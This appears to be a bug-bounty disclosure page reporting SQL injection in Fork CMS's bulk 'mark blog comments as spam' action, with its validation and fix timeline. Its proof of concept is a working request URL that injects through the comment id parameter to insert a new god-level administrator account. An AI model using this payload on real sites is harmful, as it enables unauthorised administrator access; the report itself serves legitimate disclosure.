SQL injection through marking blog comments on bulk as spam in forkcms/forkcms

Valid

Reported on

Mar 23rd 2022


Description

the comments ids aren't checked and vulnerable for SQL injection

Proof of Concept

https://127.0.0.1:8001/private/en/blog/mass_comment_action?token=q58o77xs9&id[]=3);insert%20into%20users(email,password,is_god)%20values%20(%27attacker@example.com%27,%27$2y$10$qqJ9L1lIp38gKpqh1V3l1.EqLzj.brB0IqUPQ2XXcSjl6Dtcgq16C%27,1);--+&action=spam

Impact

This vulnerability is capable of injection sql

We are processing your report and will contact the forkcms team within 24 hours. 2 months ago
Jelmer Prins modified the report
2 months ago
Jelmer Prins
2 months ago

Researcher


@admin found this one while writing fixes for other reported issues but it seems like I can't approve nor confirm it

Jamie Slome validated this vulnerability 2 months ago
Jelmer Prins has been awarded the disclosure bounty
The fix bounty is now up for grabs
Jamie Slome confirmed that a fix has been merged on 6aca30 2 months ago
The fix bounty has been dropped
to join this conversation